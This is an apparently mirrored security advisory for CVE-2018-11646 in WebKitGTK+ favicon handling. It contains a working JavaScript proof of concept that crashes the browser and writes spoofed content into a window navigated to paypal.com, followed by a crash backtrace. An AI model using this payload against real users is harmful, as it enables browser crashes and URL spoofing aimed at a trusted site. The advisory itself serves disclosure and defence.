WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service

2018-06-0500:00:00

Mishra Dhiraj

packetstormsecurity.com

0.81 High

EPSS

Percentile

98.0%

JSON

`Summary:  
  
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.  
  
PoC Author: @magicmac2000  
Found Issue in Webkit: Dhiraj Mishra (Team w00t)  
  
PoC:  
  
<script>  
win = window.open("sleep_one_second.php", "WIN");   
window.open("https://www.paypal.com", "WIN");   
win.document.execCommand('Stop');   
win.document.write("Spoofed URL");   
win.document.close();  
</script>  
  
  
Backtrace using fedora 27:  
  
#0 WTF::StringImpl::rawHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508  
#1 WTF::StringImpl::hasHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514  
#2 WTF::StringImpl::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525  
#3 WTF::StringHash::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73  
#9 WTF::HashMap, WTF::HashTraits >::get  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406  
#10 webkitFaviconDatabaseSetIconURLForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193  
#11 webkitFaviconDatabaseSetIconForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318  
#12 webkitWebViewSetIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964  
#13 WTF::Function::performCallbackWithReturnValue  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108  
#15 WebKit::WebPageProxy::dataCallback  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083  
#16 WebKit::WebPageProxy::finishedLoadingIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848  
#17 IPC::callMemberFunctionImpl::operator()  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68  
#29 WTF::RunLoop::::_FUN(gpointer)  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70  
#30 g_main_dispatch  
at gmain.c line 3148  
#31 g_main_context_dispatch  
at gmain.c line 3813  
#32 g_main_context_iterate  
at gmain.c line 3886  
#33 g_main_context_iteration  
at gmain.c line 3947  
#34 g_application_run  
at gapplication.c line 2401  
#35 main  
at ../src/ephy-main.c line 432   
  
  
Reference's:  
  
https://bugs.webkit.org/show_bug.cgi?id=186164  
https://bugzilla.gnome.org/show_bug.cgi?id=795740   
`

0.81 High

EPSS

Percentile

98.0%

JSON

Related for PACKETSTORM:148053